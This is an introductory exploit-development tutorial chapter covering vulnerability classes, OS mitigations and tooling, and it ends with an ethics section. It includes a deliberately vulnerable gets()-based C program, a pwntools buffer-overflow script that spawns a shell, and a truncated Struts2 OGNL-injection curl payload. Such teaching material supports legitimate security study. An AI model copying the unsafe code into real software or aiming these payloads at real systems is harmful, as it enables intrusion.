What is Exploit Development?
“Understanding the art of turning bugs into code execution”
Contents
- 1 🎯 Objective
- 2 1.1 What is an Exploit?
- 3 1.2 Exploit vs Payload vs Shellcode
- 4 1.3 Exploitation Workflow
- 5 1.4 Exploitation Goals
- 6 1.5 Exploit Types (By Technique)
- 7 1.6 Real Exploitation Example
- 8 1.7 Common Exploit Development Toolset
- 9 1.8 Architectural Concepts
- 10 1.9 Operating System Security Mechanisms
- 11 1.10 Real-World Exploit Example (CVE)
- 12 1.11 Ethics and Legal Responsibility
- 13 ✅ Summary
🎯 Objective
To build a comprehensive understanding of what exploit development is, its goals, classifications, and how attackers leverage vulnerabilities to hijack program execution. This chapter covers vulnerability classes, real-world scenarios, memory manipulation techniques, and low-level primitives that form the core of exploitation.
1.1 What is an Exploit?
An exploit is a crafted input, payload, or sequence of interactions that takes advantage of a vulnerability in software to achieve unintended behavior, usually with malicious or unauthorized intent.
These behaviors may include:
- Executing arbitrary code
- Reading or writing sensitive memory
- Causing a crash (Denial of Service)
- Escalating privileges
- Bypassing application logic
Example
// vulnerable.c
#include <stdio.h>
int main() {
char buffer[100];
gets(buffer); // vulnerable to buffer overflow
printf("You entered: %s\n", buffer);
return 0;
}
If buffer is overrun, the return address on the stack can be overwritten, causing the program to jump to attacker-controlled code.
1.2 Exploit vs Payload vs Shellcode
| Term | Description |
|---|---|
| Exploit | The method of taking control (e.g., stack buffer overflow, use-after-free) |
| Payload | The action performed once control is gained (e.g., spawn shell, reverse shell) |
| Shellcode | Compact machine code payload, usually to open a shell or call system functions |
1.3 Exploitation Workflow
- Discovery – Identify the vulnerability
- Analysis – Reverse engineer the bug
- Trigger – Create the condition to exploit it
- Control – Gain instruction pointer (IP) control
- Payload Execution – Run arbitrary code or commands
- Post-Exploitation – Escalate privileges, persist, exfiltrate data
1.4 Exploitation Goals
| Goal | Explanation |
|---|---|
| Code Execution | Execute arbitrary shellcode, malware, or system calls |
| Privilege Escalation | Elevate from user → admin/root/system |
| Information Disclosure | Leak memory (e.g., ASLR bypass, passwords) |
| Denial of Service | Crash system/service |
| Persistence | Survive reboots, re-infections |
| Evasion | Avoid AV, EDR, and logging tools |
1.5 Exploit Types (By Technique)
Memory Corruption-Based
- Stack Buffer Overflow
Overwriting return address on the stack. - Heap Overflow
Overwriting heap structures to gain arbitrary write or control flow. - Use-After-Free (UAF)
Using memory after it has been freed; attacker reallocates it with malicious data. - Double Free
Twofree()calls on the same pointer can corrupt heap metadata. - Format String Bug
Using uncontrolled format strings likeprintf(user_input)leads to arbitrary read/write. - Integer Overflow/Underflow
Bypass size checks, leading to incorrect memory allocations.
Logical Vulnerabilities
- Race Conditions
Timing issues in multithreaded environments. - Improper Access Control
Missing authentication or authorization checks. - Insecure Deserialization
Arbitrary object creation from untrusted data.
1.6 Real Exploitation Example
Here’s a simple Linux example of stack-based control hijacking.
vulnerable.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret() {
printf("PWNED! Code execution achieved!\n");
system("/bin/sh");
}
void vulnerable() {
char buffer[64];
printf("Enter input: ");
gets(buffer); // unsafe
}
int main() {
vulnerable();
return 0;
}
Compile with protections disabled:
gcc vulnerable.c -o vuln -fno-stack-protector -z execstack -no-pie
Exploitation Steps
- Overflow buffer and overwrite return address
- Redirect execution to
secret() - Shell spawned
You can use Pwntools to automate the attack:
from pwn import *
elf = ELF('./vuln')
p = process(elf.path)
payload = b'A' * 72 # Offset to return address
payload += p64(elf.symbols['secret'])
p.sendlineafter('Enter input: ', payload)
p.interactive()
1.7 Common Exploit Development Toolset
| Tool | Purpose | Link |
|---|---|---|
| GDB | Debugging on Linux | https://www.gnu.org/software/gdb/ |
| Pwndbg | GDB plugin for exploit dev | https://github.com/pwndbg/pwndbg |
| Pwntools | Python framework for writing exploits | https://github.com/Gallopsled/pwntools |
| x64dbg | Windows GUI debugger | https://x64dbg.com/ |
| Immunity Debugger | SEH exploit development | https://www.immunityinc.com/products/debugger/ |
| IDA Pro / Ghidra | Reverse engineering | https://ghidra-sre.org/ |
| ROPgadget | ROP chain finder | https://github.com/JonathanSalwan/ROPgadget |
| Mona.py | ROP + exploit helper for Immunity | https://github.com/corelan/mona |
| Radare2 | Binary analysis CLI tool | https://rada.re/n/ |
| msfvenom | Shellcode & payload generator | https://docs.metasploit.com/ |
1.8 Architectural Concepts
- Registers
- x86:
eax,ebx,esp,ebp,eip - x64:
rax,rbx,rsp,rbp,rip
- x86:
- Calling Conventions
- cdecl (caller cleans up stack)
- stdcall (callee cleans up stack)
- fastcall, sysv, Windows x64 (RCX, RDX, R8, R9)
- Endianness
- Most systems are little-endian (e.g.,
0xdeadbeefstored asef be ad de)
- Most systems are little-endian (e.g.,
1.9 Operating System Security Mechanisms
| Mitigation | Description |
|---|---|
| DEP / NX | Non-executable stack/heap |
| ASLR | Randomized memory layout |
| Stack Cookies | Canary values to detect buffer overflows |
| SEH | Structured Exception Handling (Windows) |
| SMEP / KASLR | Kernel memory protection |
We will cover bypass techniques for these later in:
- Return Oriented Programming (ROP)
- ret2libc
- Shellcode relocation
- Heap grooming
1.10 Real-World Exploit Example (CVE)
CVE-2017-5638 – Apache Struts2 RCE
- Vulnerability: Crafted
Content-Typeheader triggers OGNL injection. - Exploit:
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}" \ http://target.com/struts2-showcase/upload.action
Another: CVE-2017-0144 – EternalBlue
- MS SMBv1 vulnerability
- Used in WannaCry ransomware
- Kernel-level remote exploit on Windows XP to Windows 7
1.11 Ethics and Legal Responsibility
Exploit development is highly sensitive and legally restricted when performed outside ethical boundaries.
Use only in:
- Lab environments
- Capture the Flag (CTF) competitions
- Bug bounty programs
- With explicit authorization
Unauthorized access or exploitation is illegal and unethical.
✅ Summary
- An exploit is not just a payload but the entire logic and sequence required to hijack control flow.
- Memory corruption (e.g., buffer overflow, UAF) is a primary class of vulnerabilities.
- The exploitation process involves discovery, analysis, payloading, and post-exploitation steps.
- A good exploit developer is part developer, part reverse engineer, and part OS internals expert.
- Modern defenses like DEP, ASLR, stack cookies require advanced techniques to bypass.
0 Comments
Oldest